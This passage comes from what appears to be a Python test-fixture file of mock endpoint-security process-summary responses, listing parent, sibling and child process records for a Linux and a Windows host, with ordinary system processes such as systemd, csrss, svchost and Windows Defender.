"device_timestamp": "2020-08-28T19:14:41.231Z",
"filemod_count": 0,
"ingress_time": 1598642141411,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"parent_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"parent_hash": [
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85",
"e4b9902024ac32b3ca37f6b4c9b841e8"
],
"parent_name": "/usr/lib/systemd/systemd",
"parent_pid": 1,
"process_cmdline": [
"/bin/bash /usr/sbin/ksmtuned"
],
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00001615-00000000-1d6225bbba75e5e",
"process_hash": [
"c7084336325dc8eadfb1e8ff876921c4",
"5920199e4fbfa47c1717b863814722148a353e54f8c10912cf1f991a1c86309d"
],
"process_name": "/usr/bin/bash",
"process_pid": [
5653,
16139
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-05-04T21:34:03.968Z",
"process_username": [
"root"
],
"regmod_count": 0,
"scriptload_count": 0
},
"siblings": [
{
"_process_filename": "nm-dispatcher",
"backend_timestamp": "2020-08-19T20:55:33.446Z",
"childproc_count": 1,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-19T20:54:44.980Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1597870506825,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"parent_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"parent_hash": [
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85",
"e4b9902024ac32b3ca37f6b4c9b841e8"
],
"parent_name": "/usr/lib/systemd/systemd",
"parent_pid": 1,
"process_cmdline": [
"/usr/libexec/nm-dispatcher"
],
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00005742-00000000-1d6766af7bedb39",
"process_hash": [
"04b2450579a663c964f3960cd0cf93a8",
"2206d95e0a435aadad6c84b5bce370d076137efecf6adbbf6feddbe0515fb17e"
],
"process_name": "/usr/libexec/nm-dispatcher",
"process_pid": [
22338
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-08-19T20:54:44.909Z",
"process_username": [
"root"
],
"regmod_count": 0,
"scriptload_count": 0
}
]
}
}
GET_PROCESS_SUMMARY_RESP_NO_PID = {
"completed": 30,
"contacted": 30,
"exception": "",
"summary": {
"children": [],
"parent": {
"_process_filename": "systemd",
"backend_timestamp": "2020-08-28T19:12:07.989Z",
"childproc_count": 0,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-28T19:10:02.123Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1598641901273,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"process_hash": [
"e4b9902024ac32b3ca37f6b4c9b841e8",
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85"
],
"process_name": "/usr/lib/systemd/systemd",
"process_pid": [
1
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-05-04T21:34:03.968Z",
"regmod_count": 0,
"scriptload_count": 0
},
"process": {
"_process_filename": "bash",
"backend_timestamp": "2020-08-28T19:16:11.959Z",
"childproc_count": 333580,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-28T19:14:41.231Z",
"filemod_count": 0,
"ingress_time": 1598642141411,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"parent_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"parent_hash": [
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85",
"e4b9902024ac32b3ca37f6b4c9b841e8"
],
"parent_name": "/usr/lib/systemd/systemd",
"parent_pid": 1,
"process_cmdline": [
"/bin/bash /usr/sbin/ksmtuned"
],
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00001615-00000000-1d6225bbba75e5e",
"process_hash": [
"c7084336325dc8eadfb1e8ff876921c4",
"5920199e4fbfa47c1717b863814722148a353e54f8c10912cf1f991a1c86309d"
],
"process_name": "/usr/bin/bash",
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-05-04T21:34:03.968Z",
"process_username": [
"root"
],
"regmod_count": 0,
"scriptload_count": 0
},
"siblings": [
{
"_process_filename": "nm-dispatcher",
"backend_timestamp": "2020-08-19T20:55:33.446Z",
"childproc_count": 1,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-19T20:54:44.980Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1597870506825,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"parent_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"parent_hash": [
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85",
"e4b9902024ac32b3ca37f6b4c9b841e8"
],
"parent_name": "/usr/lib/systemd/systemd",
"parent_pid": 1,
"process_cmdline": [
"/usr/libexec/nm-dispatcher"
],
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00005742-00000000-1d6766af7bedb39",
"process_hash": [
"04b2450579a663c964f3960cd0cf93a8",
"2206d95e0a435aadad6c84b5bce370d076137efecf6adbbf6feddbe0515fb17e"
],
"process_name": "/usr/libexec/nm-dispatcher",
"process_pid": [
22338
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-08-19T20:54:44.909Z",
"process_username": [
"root"
],
"regmod_count": 0,
"scriptload_count": 0
}
]
}
}
GET_PROCESS_SUMMARY_RESP_NO_HASH = {
"completed": 30,
"contacted": 30,
"exception": "",
"summary": {
"children": [],
"parent": {
"_process_filename": "systemd",
"backend_timestamp": "2020-08-28T19:12:07.989Z",
"childproc_count": 0,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-28T19:10:02.123Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1598641901273,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"process_hash": [
"e4b9902024ac32b3ca37f6b4c9b841e8",
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85"
],
"process_name": "/usr/lib/systemd/systemd",
"process_pid": [
1
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-05-04T21:34:03.968Z",
"regmod_count": 0,
"scriptload_count": 0
},
"process": {
"_process_filename": "bash",
"backend_timestamp": "2020-08-28T19:16:11.959Z",
"childproc_count": 333580,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-28T19:14:41.231Z",
"filemod_count": 0,
"ingress_time": 1598642141411,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"parent_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"parent_hash": [
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85",
"e4b9902024ac32b3ca37f6b4c9b841e8"
],
"parent_name": "/usr/lib/systemd/systemd",
"parent_pid": 1,
"process_cmdline": [
"/bin/bash /usr/sbin/ksmtuned"
],
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00001615-00000000-1d6225bbba75e5e",
"process_name": "/usr/bin/bash",
"process_pid": [
5653,
16139
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-05-04T21:34:03.968Z",
"process_username": [
"root"
],
"regmod_count": 0,
"scriptload_count": 0
},
"siblings": [
{
"_process_filename": "nm-dispatcher",
"backend_timestamp": "2020-08-19T20:55:33.446Z",
"childproc_count": 1,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-19T20:54:44.980Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1597870506825,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"parent_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"parent_hash": [
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85",
"e4b9902024ac32b3ca37f6b4c9b841e8"
],
"parent_name": "/usr/lib/systemd/systemd",
"parent_pid": 1,
"process_cmdline": [
"/usr/libexec/nm-dispatcher"
],
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00005742-00000000-1d6766af7bedb39",
"process_hash": [
"04b2450579a663c964f3960cd0cf93a8",
"2206d95e0a435aadad6c84b5bce370d076137efecf6adbbf6feddbe0515fb17e"
],
"process_name": "/usr/libexec/nm-dispatcher",
"process_pid": [
22338
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-08-19T20:54:44.909Z",
"process_username": [
"root"
],
"regmod_count": 0,
"scriptload_count": 0
}
]
}
}
GET_PROCESS_SUMMARY_RESP_ZERO_CONTACTED = {
"completed": 0,
"contacted": 0,
"exception": "",
"summary": {}
}
GET_PROCESS_SUMMARY_RESP_STILL_QUERYING = {
"completed": 5,
"contacted": 10,
"exception": "",
"summary": {}
}
# Mock completed process-summary response: the target process (csrss.exe), its
# sibling processes, an empty parent, and its children. contacted == completed
# (34) marks the query as finished.
GET_PROCESS_SUMMARY_RESP_1 = {
    "exception": "",
    "summary": {
        "process": {
            "_process_filename": "csrss.exe",
            "backend_timestamp": "2020-12-03T20:34:38.889Z",
            "childproc_count": 0,
            "crossproc_count": 0,
            "device_external_ip": "24.243.76.124",
            "device_group_id": 0,
            "device_id": 329219,
            "device_internal_ip": "172.16.115.191",
            "device_name": "desktop-8qonquj",
            "device_os": "WINDOWS",
            "device_policy": "default",
            "device_policy_id": 2198,
            "device_timestamp": "2020-12-03T20:32:21.866Z",
            "filemod_count": 0,
            "has_children": False,
            "ingress_time": 1607027652665,
            "modload_count": 0,
            "netconn_count": 0,
            "org_id": "WNEXFKQ7",
            "parent_guid": "WNEXFKQ7-00050603-000001f4-00000000-1d6c86e28008165",
            "parent_hash": [
                "5f48638e3397204c2c63d7b76d025d62302d0e45fc5055c0a692b0bbc7e6b337",
                "858e3da84c5389952e1ad3701e410f61"
            ],
            "parent_name": "c:\\windows\\system32\\smss.exe",
            "parent_pid": 500,
            # The adjacent string literals below are joined by Python's implicit
            # concatenation into one command-line entry.
            "process_cmdline": [
                "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection="
                "1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll"
                "=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16"
            ],
            "process_effective_reputation": "TRUSTED_WHITE_LIST",
            "process_guid": "WNEXFKQ7-00050603-00000204-00000000-1d6c86e2801cd1b",
            "process_hash": [
                "12384336325dc8eadfb1e8ff876921c4",
                "f2c7d894abe8ac0b4c2a597caa6b3efe7ad2bdb4226845798d954c5ab9c9bf15"
            ],
            "process_name": "c:\\windows\\system32\\csrss.exe",
            "process_reputation": "TRUSTED_WHITE_LIST",
            "process_start_time": "2020-12-02T05:44:09.717Z",
            "process_username": [
                "NT AUTHORITY\\SYSTEM"
            ],
            "regmod_count": 0,
            "scriptload_count": 0
        },
        "siblings": [
            {
                "_process_filename": "winlogon.exe",
                "backend_timestamp": "2020-12-03T20:34:38.889Z",
                "childproc_count": 0,
                "crossproc_count": 0,
                "device_external_ip": "24.243.76.124",
                "device_group_id": 0,
                "device_id": 329219,
                "device_internal_ip": "172.16.115.191",
                "device_name": "desktop-8qonquj",
                "device_os": "WINDOWS",
                "device_policy": "default",
                "device_policy_id": 2198,
                "device_timestamp": "2020-12-03T20:32:08.646Z",
                "filemod_count": 0,
                "has_children": True,
                "hits": False,
                "ingress_time": 1607027652665,
                "modload_count": 0,
                "netconn_count": 0,
                "org_id": "WNEXFKQ7",
                "parent_guid": "WNEXFKQ7-00050603-000001f4-00000000-1d6c86e28008165",
                "parent_hash": [
                    "5f48638e3397204c2c63d7b76d025d62302d0e45fc5055c0a692b0bbc7e6b337",
                    "858e3da84c5389952e1ad3701e410f61"
                ],
                "parent_name": "c:\\windows\\system32\\smss.exe",
                "parent_pid": 500,
                "process_cmdline": [
                    "winlogon.exe"
                ],
                "process_effective_reputation": "LOCAL_WHITE",
                "process_guid": "WNEXFKQ7-00050603-0000025c-00000000-1d6c86e280d8ba9",
                "process_hash": [
                    "fd9aad3ea144d4c893eb0ccbff394a83",
                    "d6df7bbd93e84f5e9aec4f2d36fb04b8168e62010eae617f386c10c73b9136e6"
                ],
                "process_name": "c:\\windows\\system32\\winlogon.exe",
                "process_pid": [
                    604
                ],
                "process_reputation": "ADAPTIVE_WHITE_LIST",
                "process_start_time": "2020-12-02T05:44:09.794Z",
                "process_username": [
                    "NT AUTHORITY\\SYSTEM"
                ],
                "regmod_count": 0,
                "scriptload_count": 0
            }
        ],
        # Empty parent dict (contrast with GET_PROCESS_SUMMARY_RESP_2, which
        # populates the parent).
        "parent": {},
        "children": [
            {
                "_process_filename": "mpcmdrun.exe",
                "backend_timestamp": "2020-12-03T20:33:19.002Z",
                "childproc_count": 1,
                "crossproc_count": 5,
                "device_external_ip": "24.243.76.124",
                "device_group_id": 0,
                "device_id": 329219,
                "device_internal_ip": "172.16.115.191",
                "device_name": "desktop-8qonquj",
                "device_os": "WINDOWS",
                "device_policy": "default",
                "device_policy_id": 2198,
                "device_timestamp": "2020-12-03T20:31:13.097Z",
                "filemod_count": 1,
                "has_children": True,
                "hits": False,
                "ingress_time": 1607027590489,
                "modload_count": 18,
                "netconn_count": 0,
                "org_id": "WNEXFKQ7",
                "parent_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
                "parent_hash": [
                    "9520a99e77d6196d0d09833146424113",
                    "dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
                ],
                "parent_name": "c:\\windows\\system32\\svchost.exe",
                "parent_pid": 2924,
                "process_cmdline": [
                    "\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wddisable"
                ],
                "process_effective_reputation": "TRUSTED_WHITE_LIST",
                "process_guid": "WNEXFKQ7-00050603-0000157c-00000000-1d6c9b339b4a0cd",
                "process_hash": [
                    "cc4f6cbde75f08afdcefb95087149a5d",
                    "885557be148de55f6a127ea26ac457b9415e3e3baf30266d82b9d19b89e78ee4"
                ],
                "process_name": "c:\\program files\\windows defender\\mpcmdrun.exe",
                "process_pid": [
                    5500
                ],
                "process_reputation": "TRUSTED_WHITE_LIST",
                "process_start_time": "2020-12-03T20:31:05.847Z",
                "process_terminated": True,
                "process_username": [
                    "NT AUTHORITY\\LOCAL SERVICE"
                ],
                "regmod_count": 0,
                "scriptload_count": 0
            },
            {
                "_process_filename": "mpcmdrun.exe",
                "backend_timestamp": "2020-12-02T05:59:53.548Z",
                "childproc_count": 1,
                "crossproc_count": 4,
                "device_external_ip": "24.243.76.124",
                "device_group": "schumaker-test",
                "device_group_id": 1706,
                "device_id": 329219,
                "device_internal_ip": "172.16.115.191",
                "device_name": "desktop-8qonquj",
                "device_os": "WINDOWS",
                "device_policy": "default",
                "device_policy_id": 2198,
                "device_timestamp": "2020-12-02T05:45:15.950Z",
                "filemod_count": 1,
                "has_children": True,
                "hits": False,
                "ingress_time": 1606888776302,
                "modload_count": 16,
                "netconn_count": 0,
                "org_id": "WNEXFKQ7",
                "parent_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
                "parent_hash": [
                    "9520a99e77d6196d0d09833146424113",
                    "dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
                ],
                "parent_name": "c:\\windows\\system32\\svchost.exe",
                "parent_pid": 2924,
                "process_cmdline": [
                    "\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wdenable"
                ],
                "process_effective_reputation": "TRUSTED_WHITE_LIST",
                "process_guid": "WNEXFKQ7-00050603-00001d78-00000000-1d6c86e4f3c4a8f",
                "process_hash": [
                    "cc4f6cbde75f08afdcefb95087149a5d",
                    "885557be148de55f6a127ea26ac457b9415e3e3baf30266d82b9d19b89e78ee4"
                ],
                "process_name": "c:\\program files\\windows defender\\mpcmdrun.exe",
                "process_pid": [
                    7544
                ],
                "process_reputation": "TRUSTED_WHITE_LIST",
                "process_start_time": "2020-12-02T05:45:15.531Z",
                "process_terminated": True,
                "process_username": [
                    "NT AUTHORITY\\LOCAL SERVICE"
                ],
                "regmod_count": 0,
                "scriptload_count": 0
            },
            # NOTE(review): this third child is an exact duplicate of the second
            # (same process_guid) — presumably deliberate fixture data for
            # duplicate handling; confirm against the consuming tests.
            {
                "_process_filename": "mpcmdrun.exe",
                "backend_timestamp": "2020-12-02T05:59:53.548Z",
                "childproc_count": 1,
                "crossproc_count": 4,
                "device_external_ip": "24.243.76.124",
                "device_group": "schumaker-test",
                "device_group_id": 1706,
                "device_id": 329219,
                "device_internal_ip": "172.16.115.191",
                "device_name": "desktop-8qonquj",
                "device_os": "WINDOWS",
                "device_policy": "default",
                "device_policy_id": 2198,
                "device_timestamp": "2020-12-02T05:45:15.950Z",
                "filemod_count": 1,
                "has_children": True,
                "hits": False,
                "ingress_time": 1606888776302,
                "modload_count": 16,
                "netconn_count": 0,
                "org_id": "WNEXFKQ7",
                "parent_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
                "parent_hash": [
                    "9520a99e77d6196d0d09833146424113",
                    "dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
                ],
                "parent_name": "c:\\windows\\system32\\svchost.exe",
                "parent_pid": 2924,
                "process_cmdline": [
                    "\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wdenable"
                ],
                "process_effective_reputation": "TRUSTED_WHITE_LIST",
                "process_guid": "WNEXFKQ7-00050603-00001d78-00000000-1d6c86e4f3c4a8f",
                "process_hash": [
                    "cc4f6cbde75f08afdcefb95087149a5d",
                    "885557be148de55f6a127ea26ac457b9415e3e3baf30266d82b9d19b89e78ee4"
                ],
                "process_name": "c:\\program files\\windows defender\\mpcmdrun.exe",
                "process_pid": [
                    7544
                ],
                "process_reputation": "TRUSTED_WHITE_LIST",
                "process_start_time": "2020-12-02T05:45:15.531Z",
                "process_terminated": True,
                "process_username": [
                    "NT AUTHORITY\\LOCAL SERVICE"
                ],
                "regmod_count": 0,
                "scriptload_count": 0
            }
        ]
    },
    "contacted": 34,
    "completed": 34
}
# Mock completed process-summary response with all four sections populated:
# target process (svchost.exe), siblings, a non-empty parent (services.exe),
# and two distinct children. contacted == completed (34) marks it finished.
GET_PROCESS_SUMMARY_RESP_2 = {
    "exception": "",
    "summary": {
        "process": {
            "_process_filename": "svchost.exe",
            "backend_timestamp": "2020-12-03T20:34:38.889Z",
            "childproc_count": 3,
            "crossproc_count": 40,
            "device_external_ip": "24.243.76.124",
            "device_group_id": 0,
            "device_id": 329219,
            "device_internal_ip": "172.16.115.191",
            "device_name": "desktop-8qonquj",
            "device_os": "WINDOWS",
            "device_policy": "default",
            "device_policy_id": 2198,
            "device_timestamp": "2020-12-03T20:32:20.912Z",
            "filemod_count": 0,
            "has_children": True,
            "hits": False,
            "ingress_time": 1607027652665,
            "modload_count": 101,
            "netconn_count": 0,
            "org_id": "WNEXFKQ7",
            "parent_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
            "parent_hash": [
                "1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a",
                "2bd115a27b60b74bbeb31013519ac199"
            ],
            "parent_name": "c:\\windows\\system32\\services.exe",
            "parent_pid": 624,
            "process_cmdline": [
                "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc"
            ],
            "process_effective_reputation": "TRUSTED_WHITE_LIST",
            "process_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
            "process_hash": [
                "45684336325dc8eadfb1e8ff876921c4",
                "dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
            ],
            "process_name": "c:\\windows\\system32\\svchost.exe",
            "process_pid": [
                788
            ],
            "process_reputation": "TRUSTED_WHITE_LIST",
            "process_start_time": "2020-12-02T05:44:12.137Z",
            "process_username": [
                "NT AUTHORITY\\LOCAL SERVICE"
            ],
            "regmod_count": 5,
            "scriptload_count": 0
        },
        "siblings": [
            {
                "_process_filename": "spoolsv.exe",
                "backend_timestamp": "2020-12-03T20:34:38.889Z",
                "childproc_count": 2,
                "crossproc_count": 35,
                "device_external_ip": "24.243.76.124",
                "device_group_id": 0,
                "device_id": 329219,
                "device_internal_ip": "172.16.115.191",
                "device_name": "desktop-8qonquj",
                "device_os": "WINDOWS",
                "device_policy": "default",
                "device_policy_id": 2198,
                "device_timestamp": "2020-12-03T20:32:18.693Z",
                "filemod_count": 405,
                "has_children": True,
                "hits": False,
                "ingress_time": 1607027652665,
                "modload_count": 382,
                "netconn_count": 0,
                "org_id": "WNEXFKQ7",
                "parent_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
                "parent_hash": [
                    "1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a",
                    "2bd115a27b60b74bbeb31013519ac199"
                ],
                "parent_name": "c:\\windows\\system32\\services.exe",
                "parent_pid": 624,
                "process_cmdline": [
                    "C:\\Windows\\System32\\spoolsv.exe"
                ],
                "process_effective_reputation": "LOCAL_WHITE",
                "process_guid": "WNEXFKQ7-00050603-00000944-00000000-1d6c86e29169d10",
                "process_hash": [
                    "94170797d822cd195f8f92da9def082f",
                    "f45ca80e151494a7394dcd1958ee94c0b83fe3f7b9e281fa1e626e71ff6c2604"
                ],
                "process_name": "c:\\windows\\system32\\spoolsv.exe",
                "process_pid": [
                    2372
                ],
                "process_reputation": "COMMON_WHITE_LIST",
                "process_start_time": "2020-12-02T05:44:11.531Z",
                "process_username": [
                    "NT AUTHORITY\\SYSTEM"
                ],
                "regmod_count": 445,
                "scriptload_count": 0
            },
            {
                "_process_filename": "wmiapsrv.exe",
                "backend_timestamp": "2020-12-02T06:00:54.384Z",
                "childproc_count": 0,
                "crossproc_count": 3,
                "device_external_ip": "24.243.76.124",
                "device_group": "schumaker-test",
                "device_group_id": 1706,
                "device_id": 329219,
                "device_internal_ip": "172.16.115.191",
                "device_name": "desktop-8qonquj",
                "device_os": "WINDOWS",
                "device_policy": "default",
                "device_policy_id": 2198,
                "device_timestamp": "2020-12-02T05:46:50.369Z",
                "filemod_count": 0,
                "has_children": False,
                "ingress_time": 1606888837162,
                "modload_count": 21,
                "netconn_count": 0,
                "org_id": "WNEXFKQ7",
                "parent_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
                "parent_hash": [
                    "1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a",
                    "2bd115a27b60b74bbeb31013519ac199"
                ],
                "parent_name": "c:\\windows\\system32\\services.exe",
                "parent_pid": 624,
                "process_cmdline": [
                    "C:\\Windows\\system32\\wbem\\WmiApSrv.exe"
                ],
                "process_effective_reputation": "LOCAL_WHITE",
                "process_guid": "WNEXFKQ7-00050603-000020f8-00000000-1d6c86e87b1e2be",
                "process_hash": [
                    "55e21dfb7ec2394903e5ca62fdca21e6",
                    "55c2021f06d28696843672ff90e242c33c4cf6d30cdf0b2d9dcf07d8282cfc19"
                ],
                "process_name": "c:\\windows\\system32\\wbem\\wmiapsrv.exe",
                "process_pid": [
                    8440
                ],
                "process_reputation": "ADAPTIVE_WHITE_LIST",
                "process_start_time": "2020-12-02T05:46:50.254Z",
                "process_terminated": True,
                "process_username": [
                    "NT AUTHORITY\\SYSTEM"
                ],
                "regmod_count": 1,
                "scriptload_count": 0
            }
        ],
        "parent": {
            "_process_filename": "services.exe",
            "backend_timestamp": "2020-12-03T20:34:38.889Z",
            "childproc_count": 243,
            "crossproc_count": 39,
            "device_external_ip": "24.243.76.124",
            "device_group_id": 0,
            "device_id": 329219,
            "device_internal_ip": "172.16.115.191",
            "device_name": "desktop-8qonquj",
            "device_os": "WINDOWS",
            "device_policy": "default",
            "device_policy_id": 2198,
            "device_timestamp": "2020-12-03T20:32:13.397Z",
            "filemod_count": 0,
            "has_children": True,
            "hits": False,
            "ingress_time": 1607027652665,
            "modload_count": 53,
            "netconn_count": 0,
            "org_id": "WNEXFKQ7",
            "parent_guid": "WNEXFKQ7-00050603-000001fc-00000000-1d6c86e2801246d",
            "parent_hash": [
                "d5e122606054fa0b03db3ee8cf9ea7701e523875e2bdb87581ad7232ffc9308e",
                "e83650f70459a027aa596e1a73c961a1"
            ],
            "parent_name": "c:\\windows\\system32\\wininit.exe",
            "parent_pid": 508,
            "process_cmdline": [
                "C:\\Windows\\system32\\services.exe"
            ],
            "process_effective_reputation": "TRUSTED_WHITE_LIST",
            "process_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
            "process_hash": [
                "2bd115a27b60b74bbeb31013519ac199",
                "1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a"
            ],
            "process_name": "c:\\windows\\system32\\services.exe",
            "process_pid": [
                624
            ],
            "process_reputation": "TRUSTED_WHITE_LIST",
            "process_start_time": "2020-12-02T05:44:09.808Z",
            "process_username": [
                "NT AUTHORITY\\SYSTEM"
            ],
            "regmod_count": 254,
            "scriptload_count": 0
        },
        "children": [
            {
                "_process_filename": "mpcmdrun.exe",
                "backend_timestamp": "2020-12-03T20:33:19.002Z",
                "childproc_count": 1,
                "crossproc_count": 5,
                "device_external_ip": "24.243.76.124",
                "device_group_id": 0,
                "device_id": 329219,
                "device_internal_ip": "172.16.115.191",
                "device_name": "desktop-8qonquj",
                "device_os": "WINDOWS",
                "device_policy": "default",
                "device_policy_id": 2198,
                "device_timestamp": "2020-12-03T20:31:13.097Z",
                "filemod_count": 1,
                "has_children": True,
                "hits": False,
                "ingress_time": 1607027590489,
                "modload_count": 18,
                "netconn_count": 0,
                "org_id": "WNEXFKQ7",
                "parent_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
                "parent_hash": [
                    "9520a99e77d6196d0d09833146424113",
                    "dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
                ],
                "parent_name": "c:\\windows\\system32\\svchost.exe",
                "parent_pid": 2924,
                "process_cmdline": [
                    "\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wddisable"
                ],
                "process_effective_reputation": "TRUSTED_WHITE_LIST",
                "process_guid": "WNEXFKQ7-00050603-0000157c-00000000-1d6c9b339b4a0cd",
                "process_hash": [
                    "cc4f6cbde75f08afdcefb95087149a5d",
                    "885557be148de55f6a127ea26ac457b9415e3e3baf30266d82b9d19b89e78ee4"
                ],
                "process_name": "c:\\program files\\windows defender\\mpcmdrun.exe",
                "process_pid": [
                    5500
                ],
                "process_reputation": "TRUSTED_WHITE_LIST",
                "process_start_time": "2020-12-03T20:31:05.847Z",
                "process_terminated": True,
                "process_username": [
                    "NT AUTHORITY\\LOCAL SERVICE"
                ],
                "regmod_count": 0,
                "scriptload_count": 0
            },
            {
                "_process_filename": "mpcmdrun.exe",
                "backend_timestamp": "2020-12-02T05:59:53.548Z",
                "childproc_count": 1,
                "crossproc_count": 4,
                "device_external_ip": "24.243.76.124",
                "device_group": "schumaker-test",
                "device_group_id": 1706,
                "device_id": 329219,
                "device_internal_ip": "172.16.115.191",
                "device_name": "desktop-8qonquj",
                "device_os": "WINDOWS",
                "device_policy": "default",
                "device_policy_id": 2198,
                "device_timestamp": "2020-12-02T05:45:15.950Z",
                "filemod_count": 1,
                "has_children": True,
                "hits": False,
                "ingress_time": 1606888776302,
                "modload_count": 16,
                "netconn_count": 0,
                "org_id": "WNEXFKQ7",
                "parent_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
                "parent_hash": [
                    "9520a99e77d6196d0d09833146424113",
                    "dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
                ],
                "parent_name": "c:\\windows\\system32\\svchost.exe",
                "parent_pid": 2924,
                "process_cmdline": [
                    "\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wdenable"
                ],
                "process_effective_reputation": "TRUSTED_WHITE_LIST",
                "process_guid": "WNEXFKQ7-00050603-00001d78-00000000-1d6c86e4f3c4a8f",
                "process_hash": [
